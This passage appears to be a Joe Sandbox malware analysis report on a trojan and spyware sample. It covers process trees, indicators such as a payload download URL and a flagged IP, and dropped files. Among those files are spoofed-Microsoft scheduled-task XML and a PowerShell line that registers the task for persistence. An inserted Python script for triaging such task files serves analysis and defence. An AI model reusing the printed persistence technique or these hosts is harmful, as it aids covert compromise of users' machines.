    started: [40] powershell.exe; [43] conhost.exe

[25] cmd.exe
    started: [45] conhost.exe; [47] powershell.exe

[27] powershell.exe
    Signatures: Loading BitLocker PowerShell Module
    started: [49] WmiPrvSE.exe

[40] powershell.exe
    Signatures: Loading BitLocker PowerShell Module

Source | Detection | Scanner
leBwnyHIgx.exe | 29% | Virustotal
leBwnyHIgx.exe | 24% | ReversingLabs

Source | Detection | Scanner
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\wpsv.5.6.3[1].exe | 4% | ReversingLabs
C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | 24% | ReversingLabs
C:\Users\user\Downloads\wpsv.5.6.3.exe | 4% | ReversingLabs
                      No Antivirus matches
                      No Antivirus matches
Source | Detection | Scanner | Label
https://xrpy.oss-ap-southeast-1.aliyuncs.com/wpsv.5.6.3.exe | 0% | Avira URL Cloud | safe
http://crl.m76u8s | 0% | Avira URL Cloud | safe
https://xrpy.oss-ap-southeast-1.aliyuncs.com/wpsv.5.6.3.exex | 0% | Avira URL Cloud | safe
http://crl.microsof | 0% | Avira URL Cloud | safe
154.82.85.107:15092 | 0% | Avira URL Cloud | safe
http://schemas.microsoft.co | 0% | Avira URL Cloud | safe
https://xrpy.oss-ap-southeast-1.aliyuncs.com/ | 0% | Avira URL Cloud | safe
https://xrpy.oss-ap-southeast-1.aliyuncs.com/wpsv.5.6.3.exec | 0% | Avira URL Cloud | safe
154.82.85.107:15091 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
xrpy.oss-ap-southeast-1.aliyuncs.com | 47.79.48.230 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
154.82.85.107:15091 | true | Avira URL Cloud: safe | unknown
154.82.85.107:15092 | true | Avira URL Cloud: safe | unknown
https://xrpy.oss-ap-southeast-1.aliyuncs.com/wpsv.5.6.3.exe | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.innosetup.com/ | leBwnyHIgx.exe, leBwnyHIgx.exe.0.dr | false | | high
http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.1706524566.0000000005C27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1762406995.0000000005F28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1795405452.00000000052D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2023878360.00000000058D7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 0000000B.00000002.1781132282.00000000043C6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://code.visualstudio.com/0 | leBwnyHIgx.exe, leBwnyHIgx.exe.0.dr | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000013.00000002.2007422106.00000000049C6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000003.00000002.1704205290.0000000004D16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.0000000005016000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1781132282.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.0000000004E55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.00000000049C6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.microsoft | powershell.exe, 0000000B.00000002.1806539404.0000000006E55000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1780310479.00000000028CA000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000013.00000002.2007422106.00000000049C6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000003.00000002.1704205290.0000000005311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.000000000581D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.00000000055F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.0000000004FA4000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000013.00000002.2023878360.00000000058D7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000013.00000002.2023878360.00000000058D7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://xrpy.oss-ap-southeast-1.aliyuncs.com/wpsv.5.6.3.exex | leBwnyHIgx.exe, 00000000.00000002.2077337213.0000000000960000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000013.00000002.2007422106.00000000049C6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.mi | powershell.exe, 0000000B.00000002.1806539404.0000000006E55000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crl.m76u8s | leBwnyHIgx.exe, 00000000.00000002.2078649644.0000000003906000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.micro | powershell.exe, 00000003.00000002.1703418182.0000000002F17000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2029415416.000000000701B000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crl.microsof | powershell.exe, 00000014.00000002.1996269596.0000000002971000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000003.00000002.1704205290.0000000004D16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.0000000005016000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1781132282.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.0000000004E55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.00000000049C6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000013.00000002.2023878360.00000000058D7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.1706524566.0000000005C27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1762406995.0000000005F28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1795405452.00000000052D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2023878360.00000000058D7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://xrpy.oss-ap-southeast-1.aliyuncs.com/ | leBwnyHIgx.exe, 00000000.00000002.2077337213.0000000000960000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.remobjects.com/ps | leBwnyHIgx.exe, leBwnyHIgx.exe.0.dr | false | | high
https://xrpy.oss-ap-southeast-1.aliyuncs.com/wpsv.5.6.3.exeX | leBwnyHIgx.exe, 00000000.00000002.2077337213.0000000000960000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000003.00000002.1704205290.0000000004BC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.0000000004EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1781132282.0000000004271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.0000000004871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1998706833.00000000042E7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.microsoft.co | powershell.exe, 00000013.00000002.2028829277.0000000006FDA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore6lBtq | powershell.exe, 00000003.00000002.1704205290.0000000004BC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.0000000004EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1781132282.0000000004271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.0000000004871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1998706833.00000000042CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1998706833.00000000042BC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://xrpy.oss-ap-southeast-1.aliyuncs.com/wpsv.5.6.3.exec | leBwnyHIgx.exe, 00000000.00000002.2077337213.0000000000960000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
47.79.48.230 | xrpy.oss-ap-southeast-1.aliyuncs.com | United States | 9500 | VODAFONE-TRANSIT-ASVodafoneNZLtdNZ | false
154.82.85.107 | unknown | Seychelles | 32708 | ROOTNETWORKSUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1585743
Start date and time: 2025-01-08 07:14:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 39s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: leBwnyHIgx.exe
renamed because original name is a hash value
Original Sample Name: 51434b554c4e3b123e0a90db3048ec6d5edaed4cdb245c8f9e3dbddb378f2845.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@29/27@1/2
EGA Information:
• Successful, ratio: 33.3%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 210
• Number of non-executed functions: 207
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.253.45
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Execution Graph export aborted for target powershell.exe, PID 2032 because it is empty
                                                                  • Execution Graph export aborted for target powershell.exe, PID 5444 because it is empty
                                                                  • Execution Graph export aborted for target powershell.exe, PID 6100 because it is empty
                                                                  • Execution Graph export aborted for target powershell.exe, PID 6616 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:14:59 | API Interceptor | 51x Sleep call for process: powershell.exe modified
01:15:29 | API Interceptor | 3197138x Sleep call for process: leBwnyHIgx.exe modified
                                                                  No context
                                                                  No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
VODAFONE-TRANSIT-ASVodafoneNZLtdNZ | miori.arm5.elf | malicious | Unknown | 47.78.226.190
 | miori.spc.elf | malicious | Unknown | 118.95.51.101
 | z0r0.sh4.elf | malicious | Mirai | 121.74.70.74
 | armv4l.elf | malicious | Unknown | 118.95.125.90
 | HGwpjJUqhW.exe | malicious | GhostRat | 47.79.48.211
 | 1731043030539.exe | malicious | ReflectiveLoader | 47.76.199.218
 | armv7l.elf | malicious | Unknown | 47.78.236.90
 | botx.mips.elf | malicious | Mirai | 49.226.28.57
 | zhuzhu.exe | malicious | GhostRat, XRed | 47.79.48.211
 | QQyisSetups64.exe | malicious | GhostRat | 47.79.48.211
ROOTNETWORKSUS | 6f0slJzOrF.exe | malicious | GhostRat | 154.82.85.79
 | m68k.elf | malicious | Mirai, Moobot | 156.236.225.1
 | Installer eSPT Masa PPh versi 2.0#U007e26022009.exe | malicious | BlackMoon | 154.82.113.139
 | Installer eSPT Masa PPh versi 2.0#U007e26022009.exe | malicious | BlackMoon | 154.82.113.139
 | MicrosoftEdgeUpdateSetup.exe | malicious | Unknown | 154.82.68.34
 | nshkarm5.elf | malicious | Mirai | 154.94.148.181
 | x86.elf | malicious | Unknown | 154.82.151.143
 | bot.x86.elf | malicious | Mirai | 38.145.246.125
 | nsharm7.elf | malicious | Mirai | 156.236.225.1
 | akcqrfutuo.elf | malicious | Unknown | 154.94.130.206
Match | Associated Sample Name / URL | Detection | Threat Name | Context
 | 37f463bf4616ecd445d4a1937da06e19c2.hta | malicious | Remcos | 47.79.48.230
 | c2.hta | malicious | Remcos | 47.79.48.230
 | setup.msi | malicious | Unknown | 47.79.48.230
 | 1.exe | malicious | LummaC, XRed | 47.79.48.230
 | 9876567899.bat.exe | malicious | Lokibot | 47.79.48.230
 | 23567791246-764698008.02.exe | malicious | Unknown | 47.79.48.230
 | c2.hta | malicious | Remcos | 47.79.48.230
 | H565rymIuO.doc | malicious | Unknown | 47.79.48.230
 | 287438657364-7643738421.08.exe | malicious | Nitol | 47.79.48.230
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\Downloads\wpsv.5.6.3.exe | WPS#U529e#U516c#U8f6f#U4ef6 v76.23.66.msi | malicious | FatalRAT, GhostRat, Nitol
 | fNlAH8RgLk.exe | malicious | Unknown
 | fNlAH8RgLk.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\wpsv.5.6.3[1].exe | WPS#U529e#U516c#U8f6f#U4ef6 v76.23.66.msi | malicious | FatalRAT, GhostRat, Nitol
 | fNlAH8RgLk.exe | malicious | Unknown
 | fNlAH8RgLk.exe | malicious | Unknown
Process: C:\Users\user\Desktop\leBwnyHIgx.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category: dropped
Size (bytes): 3027728
Entropy (8bit): 7.856503406318228
Encrypted: false
SSDEEP: 49152:sejRVM654Suz/Debm7vpElDBc4uN+C+LHseGi1pm2PfLwUA0EUEiXDSWqf16yag5:sejRVMDhe6yH1ugfHseGKtPDw50E1iTe
MD5: B52BA2B99108C496389AE5BB81FA6537
SHA1: 9073D8C4A1968BE24357862015519F2AFECD833A
SHA-256: C6AC7D9ADD40B913112B265D4F366D9EF80BBD711049DB085FC750FCAD4E14D8
SHA-512: 6637506EE80D359E729E0011B97E8D827E14356393193247F502B7FCFBBCA249DC045B8ACFE4B31CE462468F421DC5D9A4E31183BEDB66C45A9AA43C01F81397
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 4%
Joe Sandbox View:
• Filename: WPS#U529e#U516c#U8f6f#U4ef6 v76.23.66.msi, Detection: malicious
• Filename: fNlAH8RgLk.exe, Detection: malicious
• Filename: fNlAH8RgLk.exe, Detection: malicious
                                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......q...5...5...5...n.......n........a/.<......&....../...n...4...n...4..........n.......n...6...5... ...........5...V...............4...5...7.......4...Rich5...........PE..L.....dc..................*.......,..ZW...,..`W...@..........................0Z......s....@.................................T-Z......`W.T.............-..H....Z..............................\W......\W.....................$PD.@...................UPX0......,.............................UPX1......*...,...*.................@....rsrc........`W.......*.............@......................................................................................................................................................................................................................................................................................................................................3.08.UPX!....
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1510207563435464
Encrypted: false
SSDEEP: 3:Nlllul3kXth:NllUU9
MD5: 019176F36446FB707E6BC4E6B2DC1872
SHA1: BD4BC5E64D663A8CABB7B85DE200150A6EF161CE
SHA-256: 710409E2A9EFBB4094ACF266005C16DA382F7F8DCB135766A558419E23AD142F
SHA-512: 6673E319305C9BED1DBA99B8EBACBC148D75100811FB12E2D4C3D2865856D128B0AF8AAFEC5E0F6F258042E7D2EF9519D668D17E87F25318011D7FB0C4355A98
Malicious: false
                                                                              Preview:@...e.................................f..............@..........
Process: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe
File Type: XML 1.0 document, ASCII text
Category: dropped
Size (bytes): 1893
Entropy (8bit): 5.212287775015203
Encrypted: false
SSDEEP: 48:c55XzDl4Q2ZbXL6Q0QFdOFQOzN33O4OiDdKrKsTLXbGMv:O5XzDl4Q2ZbGQhFdOFQOzBdKrKsTLXbV
MD5: E3FB2ECD2AD10C30913339D97E0E9042
SHA1: A004CE2B3D398312B80E2955E76BDA69EF9B7203
SHA-256: 1BD6DB55FFF870C9DF7A0AAC11B895B50F57774F20A5744E63BBC3BD40D11F28
SHA-512: 9D6F0C1E344F1DC5A0EF4CAAD86281F92A6C108E1085BACD8D6143F9C742198C2F759CA5BDFFAD4D9E40203E6B0460E84896D1C6B8B1759350452E1DE809B716
Malicious: false
                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2006-11-10T14:29:55.5851926</Date>. <Author>Microsoft Corporation</Author>. <Description>????? AD RMS ?????????????????? Web ?????????,???????????</Description>. <URI>\AS AMD updata</URI>. <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>. </RegistrationInfo>. <Triggers>. <LogonTrigger id="06b3f632-87ad-4ac0-9737-48ea5ddbaf11">. <Enabled>true</Enabled>. <Delay>PT30S</Delay>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="AllUsers">. <GroupId>S-1-1-0</GroupId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerm
                                                                              Process:C:\Users\user\Desktop\leBwnyHIgx.exe
                                                                              File Type:XML 1.0 document, ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):1743
                                                                              Entropy (8bit):5.172564010951281
                                                                              Encrypted:false
                                                                              SSDEEP:48:ck5XzDlybXL6Q0QFdOFQOzN33O4OiDdKrKsTLXbGMv:75XzDlybGQhFdOFQOzBdKrKsTLXbV
                                                                              MD5:A16DD00D191DC2FC881634D7DEE2026C
                                                                              SHA1:53A373DC6DA7CA186695CCCB9BF3CFC205C45C58
                                                                              SHA-256:27CD089F35A3AB92614414C0788900BC64C637B2FC011858932F335C88FEF23D
                                                                              SHA-512:F430EB5753C428D3473485217865F9BC8C16804C211A2788E3B90D6F9CE499BF0842EB35A4519AD5223741348E4AB47F80A4F13004D5EE9B2CD0322B75E82264
                                                                              Malicious:false
                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.6" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2006-11-10T14:29:55.5851926</Date>. <Author>Microsoft Corporation</Author>. <Description>????? AD RMS ?????????????????? Web ?????????,???????????</Description>. <URI>\.Net OneStart</URI>. <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>. </RegistrationInfo>. <Triggers />. <Principals>. <Principal id="AllUsers">. <GroupId>S-1-1-0</GroupId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>.
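The two task definitions above are the sample's persistence mechanism, and the fields the report previews (spoofed Microsoft author, task paths outside \Microsoft\, Everyone as principal at HighestAvailable, a 30-second logon trigger on one task and no trigger at all on the other, AllowHardTerminate=false) are exactly what an analyst should pull out of them. The script below is an added example, not code from the report or from the sample: it reconstructs the two task bodies from the visible preview fields (the Actions element and its command are hypothetical placeholders, since the previews are truncated before that point), decodes them despite the quirk the report records (the files declare UTF-16 but are plain ASCII text), and reduces each to a list of findings.

```python
"""Offline triage of Task Scheduler XML like the two task definitions dropped
by the sample. Added example, not code from the report or the sample: the
task bodies are CONSTRUCTED from the report's previews, and the <Actions>
element and its command are hypothetical placeholders."""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# SDDL ACE: (type;flags;rights;object_guid;inherit_guid;sid); both GUID fields empty here.
SDDL_ACE = re.compile(r"\(([A-Z]+);([A-Z]*);([A-Z0-9x]*);;;([A-Z]{2}|S-[\d-]+)\)")

LOGON_TRIGGER = """<Triggers>
    <LogonTrigger id="06b3f632-87ad-4ac0-9737-48ea5ddbaf11">
      <Enabled>true</Enabled>
      <Delay>PT30S</Delay>
    </LogonTrigger>
  </Triggers>"""
NO_TRIGGER = "<Triggers />"


def build_task(version: str, uri: str, triggers: str) -> bytes:
    """Assemble a constructed task body. RegistrationInfo, Principal and
    Settings mirror the report previews; the Exec command is a placeholder."""
    body = f'''<?xml version="1.0" encoding="UTF-16"?>
<Task version="{version}" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Author>Microsoft Corporation</Author>
    <URI>{uri}</URI>
    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>
  </RegistrationInfo>
  {triggers}
  <Principals>
    <Principal id="AllUsers">
      <GroupId>S-1-1-0</GroupId>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
    <AllowHardTerminate>false</AllowHardTerminate>
  </Settings>
  <Actions Context="AllUsers">
    <Exec><Command>C:\\ProgramData\\hypothetical\\payload.exe</Command></Exec>
  </Actions>
</Task>'''
    # Declared UTF-16 but written as single-byte text, exactly as the report
    # records the dropped files ("XML 1.0 document, ASCII text").
    return body.encode("ascii")


def decode_task_xml(raw: bytes) -> str:
    """Decode tolerantly: honour a UTF-16 BOM when present, otherwise treat the
    bytes as single-byte text whatever the declaration claims, and drop the
    declaration so the parser cannot reject the encoding mismatch."""
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        text = raw.decode("utf-16")
    else:
        text = raw.decode("utf-8", errors="replace")
    return re.sub(r"^\s*<\?xml[^>]*\?>", "", text, count=1).lstrip()


def triage_task(raw: bytes) -> dict:
    """Extract the persistence-relevant fields and derive findings from them."""
    root = ET.fromstring(decode_task_xml(raw))

    def text(path: str) -> str:
        node = root.find(path, NS)
        return (node.text or "").strip() if node is not None else ""

    author = text("t:RegistrationInfo/t:Author")
    uri = text("t:RegistrationInfo/t:URI")
    sddl = text("t:RegistrationInfo/t:SecurityDescriptor")
    group = text("t:Principals/t:Principal/t:GroupId")
    run_level = text("t:Principals/t:Principal/t:RunLevel")
    # Strip the namespace from each trigger element name, e.g. LogonTrigger.
    triggers = [t.tag.split("}")[1] for t in root.findall("t:Triggers/*", NS)]
    aces = [(typ, rights, sid) for typ, _flags, rights, sid in SDDL_ACE.findall(sddl)]

    findings = []
    if author == "Microsoft Corporation" and not uri.startswith("\\Microsoft\\"):
        findings.append("author claims Microsoft Corporation but the URI is outside \\Microsoft\\")
    if group == "S-1-1-0" and run_level == "HighestAvailable":
        findings.append("principal is Everyone (S-1-1-0) at HighestAvailable run level")
    if "LogonTrigger" in triggers:
        findings.append("logon trigger: re-executes at every interactive logon")
    if not triggers:
        findings.append("no triggers: only runs on demand (another task, schtasks /Run, or the API)")
    if text("t:Settings/t:AllowHardTerminate") == "false":
        findings.append("AllowHardTerminate=false: the scheduler will not forcibly stop it")
    return {"uri": uri, "author": author, "group": group, "run_level": run_level,
            "triggers": triggers, "aces": aces, "findings": findings}


# Constructed from the two previews: the logon-triggered task and the trigger-less one.
AS_AMD_UPDATA = build_task("1.3", "\\AS AMD updata", LOGON_TRIGGER)
NET_ONESTART = build_task("1.6", "\\.Net OneStart", NO_TRIGGER)

if __name__ == "__main__":
    for raw in (AS_AMD_UPDATA, NET_ONESTART):
        result = triage_task(raw)
        print(result["uri"], "|", "; ".join(result["findings"]))
```

On a live host the same checks apply to the exported XML of a registered task (`schtasks /Query /TN "\AS AMD updata" /XML`), where the real Actions element is available; the decoding step matters there too, because a task body that declares UTF-16 without actually being UTF-16 is rejected by strict parsers and is itself a hint that the XML was hand-written rather than produced by the Task Scheduler.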
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              The same 60-byte file (identical hashes and preview) is listed 17 more times, one entry per powershell.exe process that dropped it.
                                                                              Process:C:\Users\user\Desktop\leBwnyHIgx.exe
                                                                              File Type:ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):151
                                                                              Entropy (8bit):4.741657013789009
                                                                              Encrypted:false
                                                                              SSDEEP:3:41Ai+PBoAwnLFsI2FIERMJyjqLWAfXIhS/ytIEFMEQVGdAn:4yi+5dwnLFsI2F5KJy0fXnMFFQhn
                                                                              MD5:AA0E1012D3B7C24FAD1BE4806756C2CF
                                                                              SHA1:FE0D130AF9105D9044FF3D657D1ABEAF0B750516
                                                                              SHA-256:FC47E1FA89397C3139D9047DC667531A9153A339F8E29AC713E518D51A995897
                                                                              SHA-512:15FAE192951747A0C71059F608700F88548F3E60BB5C708B206BF793A7E3D059A278F2058D4AC86B86781B202037401A29602EE4D6C0CBAAFF532CEF311975F4
                                                                              Malicious:false
                                                                              Preview:$xmlPath = "XML??".$taskName = "????".$xmlContent = Get-Content -Path $xmlPath | Out-String.Register-ScheduledTask -Xml $xmlContent -TaskName $taskName
                                                                              Process:C:\Users\user\AppData\Roaming\leBwnyHIgx.exe
                                                                              File Type:ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):151
                                                                              Entropy (8bit):4.741657013789009
                                                                              Encrypted:false
                                                                              SSDEEP:3:41Ai+PBoAwnLFsI2FIERMJyjqLWAfXIhS/ytIEFMEQVGdAn:4yi+5dwnLFsI2F5KJy0fXnMFFQhn
                                                                              MD5:AA0E1012D3B7C24FAD1BE4806756C2CF
                                                                              SHA1:FE0D130AF9105D9044FF3D657D1ABEAF0B750516
                                                                              SHA-256:FC47E1FA89397C3139D9047DC667531A9153A339F8E29AC713E518D51A995897
                                                                              SHA-512:15FAE192951747A0C71059F608700F88548F3E60BB5C708B206BF793A7E3D059A278F2058D4AC86B86781B202037401A29602EE4D6C0CBAAFF532CEF311975F4
                                                                              Malicious:false
                                                                              Preview:$xmlPath = "XML??".$taskName = "????".$xmlContent = Get-Content -Path $xmlPath | Out-String.Register-ScheduledTask -Xml $xmlContent -TaskName $taskName
                                                                              Process:C:\Users\user\Desktop\leBwnyHIgx.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):2581432
                                                                              Entropy (8bit):6.402040529665259
                                                                              Encrypted:false
                                                                              SSDEEP:49152:Io/KpmZubPf2S8W2ILeWl+C1p9jWy5Snd0eigXNCM:T/jtYLP1Sy5E0fM
                                                                              MD5:2A7776214C4870137FE8AABB231CF52E
                                                                              SHA1:3134458AD9FF7A6E76543427794FBCEE1D7EDA07
                                                                              SHA-256:51434B554C4E3B123E0A90DB3048EC6D5EDAED4CDB245C8F9E3DBDDB378F2845
                                                                              SHA-512:E519D2D4C92E7EF921231B733EB614B800E9DEBA0DCCDC534A668FB81BF2F925F48E87E5983AC6CCBF026E5109C7EF8E6752E16376305091745289938ECF2839
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 24%
